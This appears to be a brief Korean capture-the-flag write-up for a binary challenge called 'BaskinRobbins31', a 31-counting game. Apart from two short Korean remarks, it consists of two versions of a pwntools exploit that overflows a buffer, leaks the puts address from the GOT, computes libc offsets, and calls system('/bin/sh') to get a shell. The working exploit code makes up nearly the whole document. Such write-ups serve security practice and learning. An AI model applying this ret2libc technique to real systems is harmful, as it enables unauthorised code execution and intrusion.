BaskinRobbins31
Binary File
[사진 1-1]
우리가 아는 그 베라 게임이다. 하지만 일반적인 방법으로는 이길 수 없다.
[사진 1-2]
필승법으로 이겨보려 하지만 치트를 쓴다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| from pwn import *
r = process('./baskin') e = ELF('./baskin') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] system_offset = libc.symbols['system'] binsh_offset = libc.search('/bin/sh').next() your_turn = e.symbols['your_turn'] puts_plt = e.plt['puts'] puts_got = e.got['puts'] pr = 0x400bc3
payload = "" payload += "\x90"*184 payload += p64(pr) payload += p64(puts_got) payload += p64(puts_plt) payload += p64(your_turn) r.sendline(payload)
r.recvuntil("...:(") r.recvline()
leaked = u64(r.recv(6).ljust(8, "\x00")) libc_base = leaked - puts_offset system_addr = libc_base + system_offset binsh_addr = libc_base + binsh_offset
payload2 = "" payload2 += "\x90"*184 payload2 += p64(pr) payload2 += p64(binsh_addr) payload2 += p64(system_addr) r.sendlineafter("(1-3)", payload2) r.recvlines(4) r.interactive()
|
[Exploit Code]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| from pwn import *
r = process('./baskin') e = ELF('./baskin') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
puts_offset = libc.symbols['puts'] system_offset = libc.symbols['system'] binsh_offset = libc.search('/bin/sh').next() your_turn = e.symbols['your_turn'] puts_plt = e.plt['puts'] puts_got = e.got['puts'] pr = 0x400bc3
def leak(): global leaked payload = "" payload += "\x90"*184 payload += p64(pr) payload += p64(puts_got) payload += p64(puts_plt) payload += p64(your_turn) r.sendline(payload) r.recvuntil("...:(") r.recvline() leaked = u64(r.recv(6).ljust(8, "\x00"))
def offset(): global system_addr, binsh_addr libc_base = leaked - puts_offset system_addr = libc_base + system_offset binsh_addr = libc_base + binsh_offset
def exploit(): payload2 = "" payload2 += "\x90"*184 payload2 += p64(pr) payload2 += p64(binsh_addr) payload2 += p64(system_addr) r.sendlineafter("(1-3)", payload2) r.recvlines(4) r.interactive()
if __name__ == "__main__": leak() offset() exploit()
|
[Exploit Code #2]